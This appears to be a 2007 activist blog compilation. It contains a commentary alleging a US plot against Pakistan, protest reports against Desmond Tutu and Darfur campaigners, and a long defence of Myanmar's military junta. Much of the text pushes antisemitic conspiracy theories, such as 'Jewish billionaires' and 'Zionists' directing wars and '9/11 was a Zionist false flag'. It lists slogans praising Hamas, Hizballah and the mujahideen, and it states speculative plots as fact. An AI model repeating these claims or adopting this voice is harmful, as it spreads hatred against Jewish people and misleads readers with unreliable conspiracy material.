"A large number of ISI agents who are responsible for helping the Taliban and al Qaeda should be thrown in jail or killed. What I think we should do in Pakistan is a parallel version of what Iran has run against us in Iraq. giving money [and] empowering actors. Some of this will involve working with some shady characters, but the alternative—sending U. S. forces into Pakistan for a sustained bombing campaign—is worse." Steve Schippert, Weekly Standard, Nov. 2007.

In addition to these media attacks, which security experts call 'psychological operations', the American media and politicians have intensified over the past year their campaign to prepare the international public opinion to accept a western intervention in Pakistan along the lines of Iraq and Afghanistan:

• Newsweek came up with an entire cover story with a single storyline: Pakistan is a more dangerous place than Iraq.

• Senior American politicians, Republican and Democrat, have argued that Pakistan is more dangerous than Iran and merits similar treatment. On 20 October, Senator Joe Biden told ABC News that Washington needs to put soldiers on the ground in Pakistan and invite the international community to join in. "We should be in there," he said. "We should be supplying tens of millions of dollars to build new schools to compete with the madrassas. We should be in there building democratic institutions. We should be in there, and get the rest of the world in there, giving some structure to the emergence of, hopefully, the reemergence of a democratic process."

• The International Crisis Group (ICG) has recommended gradual sanctions on Pakistan similar to those imposed on Iran, e. g. slapping travel bans on Pakistani military officers and seizing Pakistani military assets abroad.

• The process of painting Pakistan's nuclear assets as pure evil lying around waiting for some do-gooder to come in and 'secure' them has reached unprecedented levels, with the U. S. media again depicting Pakistan as a nation incapable of protecting its nuclear installations. On 22 October, Jane Harman from the U. S. House Intelligence panel gave the following statement: "I think the U. S. would be wise – and I trust we are doing this – to have contingency plans [to seize Pakistan's nuclear assets], especially because should [Musharraf] fall, there are nuclear weapons there."

• The American media has now begun discussing the possibility of Pakistan breaking up and the possibility of new states of 'Balochistan' and 'Pashtunistan' being carved out of it. Interestingly, one of the first acts of the shady Maulana of Swat after capturing a few towns was to take down the Pakistani flag from the top of state buildings and replacing them with his own party flag.

• The 'chatter' about President Musharraf's eminent fall has also increased dramatically in the mainly American media, which has been very generous in marketing theories about how Musharraf might "disappear" or be "removed" from the scene. According to some Pakistani analysts, this could be an attempt to prepare the public opinion for a possible assassination of the Pakistani president.

• Another worrying thing is how American officials are publicly signaling to the Pakistanis that Mrs. Benazir Bhutto has their backing as the next leader of the country. Such signals from Washington are not only a kiss of death for any public leader in Pakistan, but the Americans also know that their actions are inviting potential assassins to target Mrs. Bhutto. If she is killed in this way, there won't be enough time to find the real culprit, but what's certain is that unprecedented international pressure will be placed on Islamabad while everyone will use their local assets to create maximum internal chaos in the country. A dress rehearsal of this scenario has already taken place in October when no less than the U. N. Security Council itself intervened to ask the international community to "assist" in the investigations into the assassination attempt on Mrs. Bhutto on 18 October. This generous move was sponsored by the U. S. and, interestingly, had no input from Pakistan which did not ask for help in investigations in the first place.

Some Pakistani security analysts privately say that American 'chatter' about Musharraf or Bhutto getting killed is a serious matter that can't be easily dismissed. Getting Bhutto killed can generate the kind of pressure that could result in permanently putting the Pakistani military on a back foot, giving Washington enough room to push for installing a new pliant leadership in Islamabad.

Having Musharraf killed isn't a bad option either. The unknown Islamists can always be blamed and the military will not be able to put another soldier at the top, and circumstances will be created to ensure that either Mrs. Bhutto or someone like her is eased into power.

The Americans are very serious this time. They cannot let Pakistan get out of their hands. They have been kicked out of Uzbekistan last year, where they were maintaining bases. They are in trouble in Afghanistan and Iraq. Iran continues to be a mess for them and Russia and China are not making it any easier. Pakistan must be 'secured' at all costs.

This is why most Pakistanis have never seen American diplomats in Pakistan active like this before. And it's not just the current U. S. ambassador, who has added one more address to her other most-frequently-visited address in Karachi, Mrs. Bhutto's house. The new address is the office of GEO, one of two news channels shut down by Islamabad for not signing the mandatory code-of-conduct. Thirty-eight other channels are operating and no one has censored the newspapers. But never mind this. The Americans have developed a 'thing' for GEO. No solace of course for ARY, the other banned channel.

Now there's also one Bryan Hunt, the U. S. consul general in Lahore, who wears the national Pakistani dress, the long shirt and baggy trousers, and is moving around these days issuing tough warnings to Islamabad and to the Pakistani government and to President Musharraf to end emergency rule, resign as army chief and give Mrs. Bhutto access to power.


So what should Pakistan do in the face of such a structured campaign to bring Pakistan down on its knees and forcibly install a pro-Washington administration in Islamabad?

There is increasing talk in Islamabad these days about Pakistan's new tough stand in the face of this malicious campaign.

As a starter, Islamabad blew the wind out of the visit of Mr. John Negroponte, the no. 2 man in the U. S. State Department, who came to Pakistan last week "to deliver a tough message" to the Pakistani president. Musharraf, to his credit, told him he won't end emergency rule until all objectives are achieved.

These objectives include:

• Cleaning up our northern and western parts of the country of all foreign operatives and their domestic pawns.

• Ensuring that Washington's plan for regime-change doesn't succeed.

• Purging the Pakistani media of all those elements that were willing or unwilling accomplices in the plan to destabilize the country.

Musharraf has also told Washington publicly that "Pakistan is more important than democracy or the constitution." This is a bold position. This kind of boldness would have served Musharraf a lot had it come a little earlier. But even now, his media management team is unable to make the most out of it.

Washington will not stand by watching as its plan for regime change in Islamabad goes down the drain. In case the Americans insist on interfering in Pakistani affairs, Islamabad, according to my sources, is looking at some tough measures:

• Cutting off oil supplies to U. S. military in Afghanistan. Pakistani officials are already enraged at how Afghanistan has turned into a staging ground for sabotage in Pakistan. If Islamabad continues to see Washington acting as a bully, Pakistani officials are seriously considering an announcement where Pakistan, for the first time since October 2001, will deny the United States use of Pakistani soil and air space to transport fuel to Afghanistan.

• Reviewing Pakistan's role in the war on terror. Islamabad needs to fight terrorists on its border with Afghanistan. But our methods need to be different to Washington's when it comes to our domestic extremists. This is where Islamabad parts ways with Washington. Pakistani officials are considering the option of withdrawing from the war on terror while maintaining Pakistan's own war against the terrorists along Afghanistan's border.

• Talks with the Taliban. Pakistan has no quarrel with Afghanistan's Taliban. They are Kabul's internal problem. But if reaching out to Afghan Taliban's Mullah Omar can have a positive impact on rebellious Pakistani extremists, then this step should be taken. The South Koreans can talk to the Taliban. Karzai has also called for talks with them. It is time that Islamabad does the same.

The Americans have been telling everyone in the world that they have paid Pakistan $10 billion dollars over the past five years. They might think this gives them the right to decide Pakistan's destiny. What they don't tell the world is how Pakistan's help secured for them their biggest footprint ever in energy-rich Central Asia.

If they forget, Islamabad can always remind them by giving them the same treatment that Uzbekistan did last year

Protest of Tutu's warmongering Against Sudan, Myanmar and China.

A handful of anti war activists protested zionist arch bishop Desmond Tutu's liberal imperialist agenda at the Sabeel conference at old south church in Boston on Sunday October 27th.

Tutu has joined in with Billioniare Tycoon Richard Branson and the "Save Darfur" campaign which who engineering a economic siege and US led international military invasion of Africa's largest oil, uranium, thorium, copper and gum Arabic rich, Palestine supporting nation.

" Let us make one thing absolutely clear as unambiguously as possible. We believe in the viability of the so-called two state solution, i. e. of an Israel with its original borders before the six day war, an Israel sovereign and independent recognised and acknowledged as such by the international community and its Arab neighbours entitled to safe and secure borders as acknowledged in international law and a Palestinian state that is viable, accessible, sovereign and with borders acknowledged and respected by all." q=cache:wuVYV08p1DIJ:www. fosna. org/investment_activism/documents/desmond_tutu_2005.pdf+tutu+sabeel&hl=en&ct=clnk&cd=1&gl=us&client=firefox-a

Tutu's name brand support and a highly financed international astro turfing campaign have been instrumental in legitimizing the New York based push for an invasion force of US, UN, AU, and PMC (Private Mercenary Corporation) Dyna Corp, PAE Loockheed troops to dismember and eviscerate pro Palestine Sudan.

Under pressure from Tutu and his fellow pro war activists the UN just broke all its own rules to give a secret, executive, no bid contract to one of the largest mercenary corporations in the world, PAE Lockheed to build dozens of foreign military bases in Sudan's oil, uranium, copper, thorium, aquifer and gum Arabic rich Darfur region.

Tutu's trips on billionaires private jets are not stopping there. He has both neo liberal gattlin guns blazing by calling for regime changing sanctions against Myanmar and economic warfare against the Chinese in the form of a boycott of the Bejin olympics.

Jewist billionaire George Soros has targeted Mynamar(Burma) for overthrow and whole sale liquidation. His well funded lie factories including Move On, HWR Human Rights Watch, Avaaza, Burma net, Democracy Now, NED National Endowment for Democracy and Gene Sharps 'Einstein Institute' have been scripting Tutu's war cries against Mynamar.

Tutu exposed himself further in joining New York's soon to be trillionaire Zionists such as the Carlyle group's David Rubinstein and their media empires in attacking China and calling for economic warfare against China's autonomy from subjection to the US Zionist capitalist conspiracy.

Additionally Tutu joined the left zionist Sabeel group in condemning armed resistance to the genocidal jewish zionist's ethnic cleansing of Palestine.

" Hey Tutu. Stop attacking Sudan. Stop your racist lies against Muslims, Arabs, Africans, Burma and China. Stop Attacking China. ",

" From the river to the sea Palestine will be free. ",

" Hey Tutu can you say how many Sudanese's did your UN troops kill today ?" y

" Victory to the New Intifada !"

About 7 Boston cops arrived with the Ursala from the National Lawyers Guild and drove us away with blows and threats down the side walk and across the street to a "protest zone" to the delight of a jewish supremist ISM activist and his henchmen.

The Jewish Community Relations Council protested the sabeel conference on both days. They are apposed to Sabeels and tutus approach of returning a small part of Palestine to its rightful owners in an effort to save the zionist project.

The Zionists at JCRC have pro settler rallies where they chant "Kill all the Arabs !" and hold up signs calling for the ethnic cleansing or "Transfer" of the remaining Palestinians and howl for the blood of anyone who supports the Palestinians struggle to liberate their country ie lebanon's hezbolla, Iraq's Saddam, Iran, Sudan, and the Afgan Taliban.

Left zionists like sabeel realize this approach will expose and ruin everything quickly so they say Palestinians should be giving back a little bit of the stolen land or even the original name of all of it as long as jewish zionist colonizers get to stay on it and they can dictate its form of government ie not islamic.

Tutu " has called for sanctions to be imposed on Sudan unless it agrees to UN troops in Darfur. He said the UN should give Sudan a deadline and say to the government: "If you do not agree to a peacekeeping force, you will have to face sanctions"

"He also suggested that a UN force could be sent to into Sudan, even without the government's permission, under the guise of seeking to arrest the officials accused of war crimes. However, the Security Council resolution which backed the creation of a UN force said it could only be deployed with Sudan's approval. "

Desmond Tutu attacking Burma and announcing economic warfare against China. http://www. youtube. com/watch? v=fBi7r-JOA4U

Tutu's "Coalition of the willing and coalition of the unwilling" http://www. burmacampaign. org. uk/pm/more. php? id=144_0_1_0_M 'ask your elected representatives to call for a significant UN force with an effective mandate' http://www. thenewblackmagazine. com/view. aspx? index=420

Zionist CAMERA on SABEEL "In addition to using deicide imagery in reference to Israel, Rev. Dr. Ateek has portrayed modern Judaism as a tribal religion indifferent to the suffering of non-Jews, suggested that instead of pursuing the creation of a Jewish State in the Middle East, Zionist leaders in the 1800s should have chosen to remain in Europe as it became more democratic. Moreover, Rev. Dr. Ateek has portrayed Zionism – the Jewish search for self-determination and safety in the Middle East – as undermining the Jewish calling to suffer." http://www. camera. org/index. asp? x_context=2&x_outlet=118&x_article=1385

Monday, October 08, 2007

US/NATO out of Afghanistan!

Sun Oct 7th 3:00-5:00 PM anti-war protest.

On the 6th anniversary of the start of the current US invasion and occupation of Afghanistan.

From the Boston Globe:

"Boston yesterday became the third US city to hold the Dream for Darfur Olympic Torch Event. Similar events have been held in countries that have experienced genocidal violence, including Rwanda, Armenia, Germany, Bosnia, Cambodia, and the border of Chad and Sudan, Savitt said."

"Speakers competed to be heard with a group of about a dozen people gathered nearby chanting, "Liars" and, "Stop the racist lies." Members of groups including Boston Anti-Zionist Action and the Troops Out Now Coalition, held signs that read, "Free Palestine" and "Stop Attacking Sudan."

They said that if the United States intervenes it would steal Sudan's resources." ( The article linked above has been removed from the Mass Green Rainbow Party web site due to pressure from pro war jewish groups here is another uncensored link)

(Ian Thal said. " The first photo was taken by me and originally posted to my flickr account and then to my blog. You did not attribute the source. Take it down immediately. You do not have permission to post my photography. If it is still on this page next time I check, I will be notifying blogger about the copyright infringement.")

http://www. boston. com/news/local/massachusetts/articles/2007/10/08/genocide_survivors_urge_china_to_address_darfur/ "..shouting slogans like "from Kabul to Jenin, victory to the mujahideen" and "From the river to the sea, Palestine must be free!"

Green Party loons heckle survivors of various genocides http://www. universalhub. com/node/10783

Why do rich Boston Zionists plot the death squad invasion of Africa's largest nation ?

"Well, if you're one of Boston's Jew-obsessed lunatics, this is called a target rich environment. Where else is it possible to display what a complete douche you are in front of such a diverse group of exceptional people? An opportunity not to be missed!

Brave Anti-Zionist Activists Heckle Warmongers: http://www. solomonia. com/blog/archive/2007/10/brave-antizionist-activists-heckle-genoc/ More Photos http://www. flickr. com/photos/ianthal/1519627302/in/photostream/ US/NATO out of Afghanistan! Stop the US/Zionist war on Sudan! Free All of Palestine!

This weekend is the 6th anniversary of the start of the current US invasion and occupation of Afghanistan. Members of the Green Party of the US Peace Action Committee have called for nationwide protests this weekend against the US/NATO war and occupation in Afghanistan.

Boston Anti-Zionist Action (BAZA) is calling for an anti-imperialist demonstration at Government Center, Boston, this Sunday, Oct 7, at 3 PM til 5PM. The time has been chosen to coincide with and confront a racist pro-war rally against Sudan organized by the JCRC (Jewish Community Relations Council of Greater Boston).

". Tensions rose during the rally when dissenting groups criticized the protesters' efforts. Co-chairwoman of the Massachusetts Coalition to Save Darfur Sifa Nsengimana tried to calm the crowd.

( an MIT student (who wouldn't give his name) tried to silence a protester (who also wouldn't give his name) representing Boston Anti-Zionist Action (BAZA) during the rally. BAZA was waging an anti-imperialist demonstration. )

BAZA ( http://www. bazabaza. blogspot. com )and our allies will be demonstrating against the war in Afghanistan, against the US/Zionist war on Sudan, and to call for Zionists Out of All of Palestine and the Middle East.

All decent justice-and-peace loving people, please join us at 3 PM at Government Center this Sunday.

Thanks and see you there. Suggested slogans:

US & NATO Get Out of Afghanistan Now From Kabul to Jenin, Victory to the Mujahideen Stop the US / Zionist War Against Sudan Stop Attacking Sudan. Stop the Racist Lies Against Muslims, Arabs and Africans US/UN/AU Get Out Stay Out of Sudan From the River to the Sea, Palestine Will Be Free All Palestinian Arab Refugees Must Be Allowed to Return to Their Homes Falasteen Arabiyeh 9/11 Was a Zionist False Flag Operation "USA" and "Israel" Are the Real Terrorists "USA" and "Israel" Are Genocidal Projects That Must Be Shut Down End the Ethiopian Proxy-US Occupation of Somalia Victory to Hizballah! Victory to Hamas! Victory to the Iraqi, Agfhan and Somali Resistances Stop the US / Zionist War Against Iran Stop the US / Zionist War Against Myanmar and China Divest from "Israel", Not From Sudan, Not From Iran, Not From Myanmar Stop the Zionist War Against Lebanon and Syria Stand With Cuba to Stop Imperialist Interference in Myanmar Stop the US War in Congo. US/UN Out of Africa No More Wars for "Israel" or for Oil

Thursday, October 04, 2007

Cuba opposed foreign interference in Myanmar's affairs

Why the sudden interest in Myanmar (Burma) ?

“The overwhelmingly greatest enemy of Myanmar is not any regime, past or present, but US and Western European imperialism, and those attached to it.”

Everyone should oppose totally the current US based plot to overthrow the government of Burma based on propaganda, imperialist lies and New York and Washington engineered franchised revolution. The ICG (International Crisis group) pushing the regime change is a front group for the Council on Foreign Relations and jewish billionaire and global pirate George Soros who also funds Human Rights Watch, Moveon. org and Moveon’s new front group Avaaz, Democracy Now and Burma. Net http://www. crisisgroup. org/home/index. cfm? id=1139&l=1 Why the sudden interest in Myanmar (Burma) ?

Franchised Regime Overthrow in Mynamar Burma, From Boston With Love Stop attacking Burma, Sudan, Oaxaca, China

A major covert spook outfit "The Albert Einstein Institute" has its safe houses right here in Boston. They have been running regime overthrow operations in Myanmar.

Why not read into this then stop by and see what the CIA is up to.

Gene Sharp The Albert Einstein Institute 427 Newbury Street Boston Ma. http://www. mapquest. com/maps/map. adp? address=427%20Newbury%20St&city=Bos= PO BOX 455, East Boston, MA 02128 USA tel: 617.247.4882 fax: 617.247.4035 email: einstein (at) igc. org

The Albert Einstein Institution: non-violence according to the CIA http://www. voltairenet. org/article30032.html Peter Ackerman: billionaire sponsor of toxic NGO’s http://louisproyect. wordpress. com/2007/10/03/peter-ackerman-billionaire-/

When CIA realized how useful could the Albert Einstein Institution be, it brought Colonel Robert Helvey into play. An expert in clandestine actions and former dean of the Embassies’s Military Attachés Training School, "Bob" took Gene Sharp to Burma to educate the opposition on the non violent strategy for criticizing the cruelest military junta of the world without questioning the system. By doing this, Helvey could identify the "good" and the "bad" opponents in a critical moment for Washington: the true opposition, led by Mrs. Suu Kyi, was labeled as a threat to the pro-American regimen.

«Bob’s» job was easily done. Since he was military attaché in Rangoon from 1983 to 1985 and helped to structure the dictatorship, he knew everybody. By playing a double game, Colonel Helvey simultaneously directed a classical action of military support to Karen resistance: by providing weapons and controlling a limited guerrilla, Washington wished, indeed, to maintain the military junta under pressure.

Myanmar's “Saffron Revolution”: The Geopolitics behind the Protest Movement http://www. scoop. co. nz/stories/HL0710/S00277.htm

Burma’s “Saffron Revolution,” like the Ukraine “Orange Revolution” or the Georgia “Rose Revolution” and the various Color Revolutions instigated in recent years against strategic states surrounding Russia, is a well-orchestrated exercise in Washington-run regime change, down to the details of “hit-and-run” protests with “swarming” mobs of Buddhists in saffron, internet blogs, mobile SMS links between protest groups, well-organized protest cells which disperse and reform. CNN made the blunder during a September broadcast of mentioning the active presence of the NED behind the protests in Myanmar.

For readers unfamiliar with the NED and its anti-democratic “democracy” cohorts, a brief introduction to the work of Professor William I. Robinson is in order. Simply put, Robinson hypothesised that as a result of the public backlash against the US government’s repressive and covert foreign policies in the 1970s, foreign-policy-making elites elected to put a greater emphasis on overt means of overthrowing “problematic” governments through the strategic manipulation of civil society.

In 1984, this “new” thinking was institutionalized with the creation of the quasi-nongovernmental organization the NED, which acts as the coordinating body for better-funded “democracy promoting” organizations like USAID and the CIA. Working closely together, these “democratic” organizations use a combination of both covert and overt strategies to intervene Promoting ‘democracy’ through civil disobedience http://www. greenleft. org. au/2007/722/37496

The concert-master of the tactics of Saffron monk-led non-violence regime change is Gene Sharp, founder of the deceptively-named Albert Einstein Institution in Cambridge Massachusetts, a group funded by an arm of the NED to foster US-friendly regime change in key spots around the world. Sharp’s institute has been active in Burma since 1989, just after the regime massacred some 3000 protestors to silence the opposition. CIA special operative and former US Military Attache in Rangoon, Col. Robert Helvey, an expert in clandestine operations, introduced Sharp to Burma in 1989 to train the opposition there in non-violent strategy. Interestingly, Sharp was also in China two weeks before the dramatic events at Tiananmen Square.

U. S. covert support for the opposition in Myanmar is based on a rapidly expanding U. S. involvement back into South Asia. Growing U. S. corporate concern with China’s growth and the Pentagon’s drive to implant a new generation of U. S. bases to control the Straits of Malacca is leading to a renewed U. S. involvement in the region. Some 80 percent of the oil bound for China passes through these straits.

The real attitude of U. S. imperialism toward the movement in Myanmar will not be guided by Washington’s concern for democratic change. It will depend on U. S. economic interests and strategic military plans in the region. http://www. workers. org/2007/world/myanmar-1108/ Soros the Guiltless http://www. americanthinker. com/2007/10/soros_the_guiltless. html

Ranging from the Asia Times and the South China Morning Post to a collection of skeptical Western bloggers, they make the claim that various Washington DC-based agencies and a few key political actors are actually pulling the strings in the Burmese uprising. The rationale behind this "foreign interference," as it has been termed by both the Burmese and Chinese governments, has been given as (take your pick): interests in oil and/or gas reserves, heroin, methamphetamines, geopolitical advantage, and power projection by the United States

On ICGs board is Henry Kissinger and Zbigniew Brzezinski who engineered the soviet invasion of Afghanistan to use it as a battle ground to inflict on the Soviet Union a military and moral defeat on the scale the US suffered in Vietnam. Additionally ICGs advisory council is made of multinational energy strip mining conglomerates and looter banks such as JP Morgan and credit Suisse.

The campaign to overthrow the government of Myanmar is based on lies and is nothing more than a Zionist imperialist war, regime change and color coded franchised revolution for the privatization and neo liberal evisceration of Myanmar’s oil, gas, precious gem and teak wood resources, strategic ports and markets including currently shut down opium production. It’s also a front on the Zionists and imperialists war on China and war on China’s “weapons of mass production”.

“ It’s a distraction from the quagmire in ME and Iran. Whenever these guys talk about human rights in some country its almost always a distraction and psychological preparation of masses for the next war” “…And by getting rid of the current regime, Burma will become integrated into the international banking system, which will keep the Burmese enslaved. "International oil and international banking. QRS suspects that the closer you look at these two, the more they are revealed to be one and the same monster. “

“Burma/Myanmar has very large reserves of Gas that China wants and the Zionist US doesn't want it to have for cheap - and so far they've resisted financial infiltration by the moneychangers. Both these factors among others (Drugs, Oil, Precious Gems) are good enough reasons for the zionized US government to get embroiled. There is one thing that we can all agree on, however - it's NOT a humanitarian cause. The fascination with Burma/Myanmar is about power, greed, and most importantly CONTROL.” “In the drug trade, it's all about monopoly.”

“ If Move On (and their new front group Avaaz) were an anti-war group they would have a petition to stop the US/Ethiopian occupation of south Somalia - where this weeks Washington Post article admits the Ethiopian (US-proxy) troops have killed 1000 people in "recent weeks" - instead of having an imperialist pro-war petition against Myanmar where all they can come up with is that the the Myanmar government allegedly shot 9 demonstrators. The "israeli" zionists, funded by our taxes, kill more Palestinians than that every week in Gaza. I don't see any petitions for Palestine from Move On. Note that U. S. assistant secretary of state Jendayi Frazer (who is mentioned in this article as having gone to Mogadishu Somalia recently to support the phony puppet government that the Ethiopians/Americans have set up there to try to justify the occupation) also was the Bush administration speaker at the pro-war rally against Sudan in April 2005 in Washington DC. Move On, and Jewish billionaire George Soros's other groups, have played a large role in inciting war against Sudan as well.

The anti-Sudan and anti-Myanmar propaganda are both tactics in imperialist economic warfare against China.

"China has a trade surplus meaning they have amassed a fortune of currency from selling Americans every disposable consumer item their credit cards can handle. New York billionaires want all that money and control over all the Chinese currency, trade and economic activity the same way they control the US currency thru the Federal Reserve Bank Corporation. The threats to boycott the Olympics are just a extortion shake down to extract huge amounts of cash payoffs in the form of Chinese investments in New York money peoples private equity firm IPOs such as Rubenstein’s Carlyle group."

With three countries -- Thailand, Cambodia, and Vietnam -- vying for the off-shore oil booty in seas where maritime borders are contested, the Cheney gangster cartel hopes to achieve a dominant position to grab that oil. (Burma is right next door. On September 16, 2006, the USA supported a military coup that overthrew Thailand's democratically elected government. Ralph Boyce -- U. S. ambassador to Thailand -- now sports a yellow tie to show his support for the royalist-backed coup, since yellow is the color of the monarchy.”

"Burma is huge in the heroin trade Burma and the Golden Triangle was the largest supplier of heroin for a long time.(until the current administration shut it down to the western drug lords dismay) Now it's Afghanistan and Mexico is coming on fast. In the drug trade, it's all about monopoly. Oil will always be 2nd to the drug trade over all in profits. Just so happens oil is high at the moment." Burma in the news at the moment is about DRUGS! Oil, Drugs, Banking, Precious gems or Gas. I suspect it's a little of all.

“The overwhelmingly greatest enemy of Myanmar is not any regime, past or present, but US and Western European imperialism, and those attached to it.”

US Industry/Think Tank blue print and talking points for the war on China and war on China’s “weapons of mass production”. http://www. steel. org/AM/Template. cfm? Section=Events1&TEMPLATE=/CM/Conten Bread and Butter Issues behind Myanmar Protests http://gowans. wordpress. com/category/myanmar/

China Approves Oil Pipeline to Burma http://www. voanews. com/burmese/archive/2006-04/2006-04-17-voa5.cfm

For the Decisive Victory of Myanmar against Imperialism http://nacazai. org/

Cuba opposed foreign interference in Myanmar's affairs http://tvscripts. edt. reuters. com/2007-09-18/36a2ff08.html Burmese FM blames 'opportunists'

He said "neo-colonialism has reared its ugly head" by trying to spread disinformation about human rights abuses in Burma. "The situation would not have deteriorated had the initial protest of a small group of activists against the rise in fuel prices had not been exploited by political opportunists," he said.

"They sought to turn the situation into a political showdown aided and abetted by some powerful countries.” http://news. bbc. co. uk/1/hi/world/asia-pacific/7023205.stm

Sanctions. Regime Change. Franchised Color Coded Revolutions, Neo Liberal Reforms, Low Intensity Democracy.

"One of the first and best known cyber campaigns confronting the Rangoon government is Burmanet, an e-mail service that distributes news about the country. A mainstay for activists and journalists covering the country, Burmanet is sponsored in part by the financier George Soros. ….Collecting information about human rights abuses and delivering them to Internet-enabled offices along the Thai border is now one of the group's priority operations." http://www. iht. com/articles/1999/10/08/rwar. t.php? page=2

Soros Foundation in the Service of US-Zionist Interests: The 1997 financial crisis in Southeast Asia was created by sudden without notice withdrawal of capital by the Soros Foundation with the deliberate intention of causing a financial crisis especially for the Muslim countries of Malaysia and Indonesia. It was part of the US plot to expand its economic hegemony over Southeast Asia. http://www. irib. com/worldservice/englishRADIO/political/Soros. htm Soros internet overthrows explained: (Low intensity democracy) http://rand. org/pubs/monograph_reports/MR1382/MR1382.ch5.pdf Junta. Thugs or Soros: The Soros Threat To Democracy http://www. ibdeditorials. com/IBDArticles. aspx? id=275526219598836

Billioniare George soros also funded Tienemman square to destabilize China and seize control of Chinas economy. http://books. google. com/books? id=jaP_2ARAsIIC&pg=PA342&lpg=PA342&dq=soro

"Billionaire George Soros" http://www. google. com/search? hl=en&safe=off&client=firefox-a&rls=org. moz

On ICGs board is Henry Kissinger and Zbigniew Brzezinski who engineered the soviet invasion of Afghanistan to use it as a battle ground to inflict on the soviet union a military and moral defeat on the scale the US suffered in Vietnam. Additionally ICGs advisory council is made of of multinational energy strip mining conglomerates and looter banks such as JP Morgan and credit Suisse.

The use of satellite data: it should be noted the funding of this comes from … “Bromley’s group got funding from the Open Society Institute and the John D. and Catherine T. MacArthur Foundation.” The Open Society Institute is the brainchild of George Soros, who was demonized earlier this week for his funding of Move On and other political activities in the US. Soros’ money is being used to unduly influence the election via front groups, a practice that is called “astroturfing” where a small number of manipulators form fake “grass roots” groups that are then given pulbicity in the press who is under the impression that their opinions are a true grass roots representation.

“The military government in Rangoon has continuously and vehemently chastized Aung San Suu Kyi as being an axehandle of the Americans – the person who supports U. S. policies toward that country. She is portrayed by the military as the puppet of the Americans…. it is highly unlikely that sanctions will result in regime change, which is the goal of that policy.”

International narcotics agenda behind Myanmar instability:

The United Nations credits Myanmar’s central government for leading opium eradication. China has played a major role pressing opium growers to eradicate.

International narcotics agenda behind Myanmar instability https://publish. indymedia. org. uk/en/2007/09/382341.html Burma, Opium & the CIA: “ To retaliate against Communist China for its intervention into the Korean War, President Truman had ordered the CIA to organize these Nationalist elements inside Burma for an invasion of China…After their invasions of 1950 were repulsed with heavy casualties, these Nationalist troops camped along the border for another decade and turned to opium trading to finance their operations. Forcing local hill tribes that produced opium, the Nationalist troops supervised a massive increase of opium production on the Shan Plateau of Burma. After the Burmese army evicted them in 1961, the Nationalist forces established a new base camp just across the Burma border in Thailand and from there dominated the Burma opium trade until the mid-1980s…” https://publish. indymedia. org. uk/en/2007/09/382329.html

What the "Junta" wants: His Excellency U Nyan Win Minister for Foreign Affairs of the Union of Myanmar http://www. un. org/webcast/ga/60/statements/mya050921eng. pdf Well, its said that the fuel crisis sparked off the protests, and this suggests that it has something to do with western controlled institutions. "The skyrocketing fuel prices are said to be part of the military junta’s economic and financial reform program, coinciding with the high-level mission to Burma by the International Monetary Fund and the World Bank. " http://opinion. inquirer. net/inquireropinion/columns/view_article. php? art "The NLD’s basic program, which consists of implementing IMF-dictated reforms to open Burma up to foreign investors, would be just as catastrophic for ordinary working people…” “… will a free and newly elected Aung San Suu Kyi sign on the dotted line with the IMF and World Bank? And will there be a deal for Western support or will she think a little more carefully about the historical precedent and tell foreign investors where to shove it?” ( Of course she will sign….they butter her bread.)

Confessions of an Economic Hit Man: How the U. S. Uses Globalization to Cheat Poor Countries Out of Trillions http://www. democracynow. org/article. pl? sid=04/11/09/1526251 "Activist media sources essentially saying that the Burmese resistance are tools of the West and that we should not support them. yes, it upsets us. A lot."

Next week which corporate media propaganda blitz do you think you'll be dancing to?

"If and when it comes out that the USuk was behind the uprising (as claimed by the junta at the UN), you're going to look pretty damn silly."

The Secret Financial Network Behind "Wizard" George Soros The political agenda of Soros and this group of financial "globalists" will create the conditions for a new outbreak of war, even world war, if it continues to be tolerated. http://www. questionsquestions. net/docs04/engdahl-soros. html

SOROS, ROTHSCHILD, MARC RICH http://www. freerepublic. com/forum/a3a7d6c502b97.htm Israel’s Double Game in Southeast Asia http://www. thetruthseeker. co. uk/article. asp? ID=6124 Jewish Billionare's Fangs Off Myanmar http://nacazai. org/VictorytoMyanmar07.html

North American Committee Against Zionism and Imperialism (NACAZAI) For the Decisive Victory of Myanmar against Imperialism and the Defense of her Ethnic Character and Territorial Independence!

--- Statement of the North American Committee Against Zionism and Imperialism (NACAZAI) On the occasion of on-going disruptions against the peace and security of Myanmar, orchestrated by the global imperialists and carried out by traitors to the nation, the North American Committee Against Zionism and Imperialism (NACAZAI) declares its total solidarity with Myanmar and her leadership against internal and external enemies of people.

The leading "dissident" of Myanmar, San Aung Suu Kyi, is little more than a puppet of western imperialism and cosmopolitan death. She has been praised by such mouthpieces as US President Bush, and seeks the goal of a liberal western-oriented Myanmar assimilated into the "global community".

One finds in these committees to "Free Burma" a blatant affinity for liberalism, and demands that US and western imperialist countries intervene politically and militarily in order to "save" them. They constitute a toilet bowl of western intellectuals and those of Myanmar's compatriots who posses a deep alienation with the dynamic self-pride of their people's culture.

(And They Are owned by Jewish Billionare George Soros and Promoted by his Move On, Avazza and The International Crisis group)

The people of Myanmar are under the radar guns of the enemy, aside from geo-political reasons and issues of wealth from national resources and the illicit drug trade which the regime has squashed, primarily because they are a proud nationalistic people deeply unsuited to globalism. As part of the international conspiracy of the enemies of nations, Myanmar is sought for "regime change" so to as to destroy the conscious racial identity of Myanmar, her nationalistic and patriotic outlook, her strong family structure, the fanatical love of Buddhism as expressed by her peasant classes, and the capacity of Myanmar to defeat an imperialist invasion with the twelfth largest military in the world.

Hence, regardless of any legitimate need for the transformation of social relations in Myanmar and emancipation of her worker and peasant classes, the overwhelmingly primary contradiction is between the Myanmar nation and the forces of imperialist subjugation and eternal death from national nihilism.

We ruthlessly condemn all measures of sanctions and embargoes directed against Myanmar, and reject the globalist conspiracy to isolate her politically from the friendship of nations. Furthermore, we affirm that all progressive and revolutionary forces of the world should defend the right of Myanmar to assert the sovereignty of her political and territorial independence.

The overwhelmingly greatest enemy of Myanmar is not any regime, past or present, but US and Western European imperialism, and those attached to it.

Victory to Myanmar in the anti-imperialist showdown! Down with the enemies of a world made of nations!

Why the sudden interest in Burma?

Stop The US Zionist, Imperialist, Jewish Billioniares War On China and China's "Weapons of Mass Production"

So why, after 45 years of ignoring the military junta's rule in Burma, does our media suddenly focus so intensely on the streets of Yangon? The answer is simple. China has been finalising plans for a pipeline "to connect Burma's deep-water port of Sittwe to the city of Kunming in the landlocked Yunnan province of southwestern China." This would effectively circumvent the Empire's stranglehold on oil shipments to East Asia, an issue of massive geostrategic importance.”

China Approves Oil Pipeline to Burma: "China wants to build the pipeline to reduce its dependence on oil tankers traveling through the Strait of Malacca with shipments of crude oil from the Middle East and Africa." http://www. voanews. com/burmese/archive/2006-04/2006-04-17-voa5.cfm
